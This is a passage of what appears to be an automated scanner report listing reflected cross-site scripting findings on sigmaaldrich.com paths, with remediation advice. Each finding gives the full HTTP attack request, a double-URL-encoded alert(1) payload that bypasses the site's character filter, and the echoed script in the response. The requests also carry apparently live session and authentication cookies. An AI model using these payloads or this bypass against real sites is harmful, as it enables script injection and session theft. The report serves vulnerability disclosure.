Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services12230";alert(1)//49f621b980a/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.170. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c3f%2522%253balert%25281%2529%252f%252fee461c7ee2b was submitted in the REST URL parameter 6. This input was echoed as 28c3f";alert(1)//ee461c7ee2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research28c3f%2522%253balert%25281%2529%252f%252fee461c7ee2b/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research28c3f";alert(1)//ee461c7ee2b/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.171. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1672f%2522%253balert%25281%2529%252f%252f90c81e119b0 was submitted in the REST URL parameter 7. This input was echoed as 1672f";alert(1)//90c81e119b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops1672f%2522%253balert%25281%2529%252f%252f90c81e119b0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops1672f";alert(1)//90c81e119b0","E404") ;
   </script>
...[SNIP]...

1.172. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4449%2522%253balert%25281%2529%252f%252fa68566a3237 was submitted in the REST URL parameter 1. This input was echoed as f4449";alert(1)//a68566a3237 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentf4449%2522%253balert%25281%2529%252f%252fa68566a3237/sigma-aldrich/customer-support/customer-service/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentf4449";alert(1)//a68566a3237/sigma-aldrich/customer-support/customer-service/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.173. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fc7e%2522%253balert%25281%2529%252f%252f8055ccc3a8 was submitted in the REST URL parameter 2. This input was echoed as 3fc7e";alert(1)//8055ccc3a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich3fc7e%2522%253balert%25281%2529%252f%252f8055ccc3a8/customer-support/customer-service/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich3fc7e";alert(1)//8055ccc3a8/customer-support/customer-service/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.174. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20793%2522%253balert%25281%2529%252f%252f82ed8dc50c0 was submitted in the REST URL parameter 3. This input was echoed as 20793";alert(1)//82ed8dc50c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the requested URL is written verbatim into the string argument of the cmCreateErrorTag() call on the 404 page, so at a minimum that value must be escaped for a JavaScript string literal (encoding quotes, backslashes, slashes and other non-alphanumeric characters as \xHH or \uHHHH sequences) before it is emitted into the script. There should be no need to URL-decode the value of REST URL parameter 3 a second time, as the web server has already decoded the path once; that second decode is what lets the double-encoded payload pass the character filter. In any case, the application should perform its input validation only after all decoding and custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support20793%2522%253balert%25281%2529%252f%252f82ed8dc50c0/customer-service/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
